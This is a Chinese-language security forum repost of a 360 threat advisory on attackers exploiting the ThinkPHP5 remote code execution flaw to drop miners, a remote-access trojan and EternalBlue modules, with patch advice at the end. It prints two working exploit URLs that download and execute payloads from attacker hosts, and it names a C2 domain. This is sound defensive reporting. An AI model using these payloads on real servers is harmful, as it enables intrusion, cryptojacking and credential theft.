请使用手机微信扫码安全登录

切换账号密码登录

绑定手机号

应国家法规对于账号实名的要求,请您在进行下一步操作前,需要先完成手机绑定 (若绑定失败,请重新登录绑定)。了解更多

不绑定绑定手机号

360官网 | 360商城

推荐论坛版块活动360粉丝商城众测粉丝轰趴馆常见问题
ThinkPHP是一款基于PHP的Web应用程序开发框架,它开源并且有着广泛的流行度,据统计,目前有超过50万台服务器正运行ThinkPHP(数据来源于Think PHP官网)。
近期ThinkPHP发布了一个安全更新,用于修复未经身份验证的高风险远程代码执行(RCE)漏洞,360Cert也曾针对该漏洞发布过预警 。而最近,我们则监测到利用这个已被披露的ThinkPHP RCE漏洞发起攻击的案例:黑客利用此漏洞在运行有未打补丁的ThinkPHP的服务器上(包含Windows、Linux)安装远控、挖矿、永恒之蓝攻击模块等。

攻击流程示意图

其一,利用ThinkPHP RCE漏洞进行挖矿:
/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd /tmp;wget hxxp://205.185.113.123/ex.sh;curl hxxp://205.185.113.123/ex.sh -O;chmod 777 ex.sh;sh ex.sh

下载挖矿木马的shell脚本

其二,利用ThinkPHP RCE漏洞执行多功能综合木马:
/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://a46.bulehero.in/download.exe','C:/12.exe');start C:/12.exe
被下载到本地的Download.exe为集远控、挖矿、永恒之蓝攻击等多合一的木马:
其中,挖矿模块参数如下:

挖矿模块参数

从钱包地址查看,已经有146个门罗币的进帐:

钱包地址相关信息

Download.exe中的永恒之蓝攻击模块:

永恒之蓝攻击模块

木马会获取本地IP段,并随机生成部分IP段进行永恒之蓝攻击尝试:

基于永恒之蓝模块发起的攻击

此外,木马还会调用mimikatz获取windows账号的密码:

调用mimkatz获取windows系统账号

最后,木马还带有远控模块,其上线地址为:a45[.]bulehero[.]in

远控功能模块


远控连接

360互联网安全中心提醒广大站长:
1. 将ThinkPHP升级到5.0.23或5.1.31以上的版本,以解决此问题。
2. 如果您正在使用基于ThinkPHP5的CMS(网站内容管理系统),也可能会受此漏洞影响,同样建议对其进行升级。
3. 服务器及时安装系统漏洞补丁并使用安全软件进行防护。
附:ThinkPHP相关说明的官网链接:https://blog.thinkphp.cn/869075


ThinkPHP5安全更新说明


来源 360官网

共 0 个关于ThinkPHP5 getshell漏洞被利用执行永恒之蓝攻击木马的回复 最后回复于 2018-12-29 20:12

评论

直达楼层

您需要登录后才可以回帖 登录 | 注册

本版积分规则

飞机飞行 超级版主

粉丝:181 关注:13 积分:237884

精华:307 金币:229324 经验:198744

最后登录时间:2024-4-19

小水滴公测勋章 智能摄像机3C 摄像机APP V7.0 智能摄像机AP2C 360AI音箱MAX-M1 公测AI小水滴D903 安全卫士10周年纪念 版主 公测360摄像机标准版 儿童五周年纪念章 360家庭防火墙APP内测 公测360摄像机户外版 360手机f4 公测360摄像机变焦宠物版 公测360家庭防火墙V5S 公测摄像机D916 家庭安防套装 防火墙V5S增强版公测勋章 360粉丝达人勋章 360商城青铜会员

私信 加好友

最新活动

360云台摄像机9Pro写评论送大奖!

排行榜

热度排行 查看排行
今日 本周 本月 全部
    今日 本周 本月 全部

      内容推荐 热门推荐最新主帖

      扫码添加360客服号,涨知识的同时还有超多福利等你哦

      快速回复 返回顶部 返回列表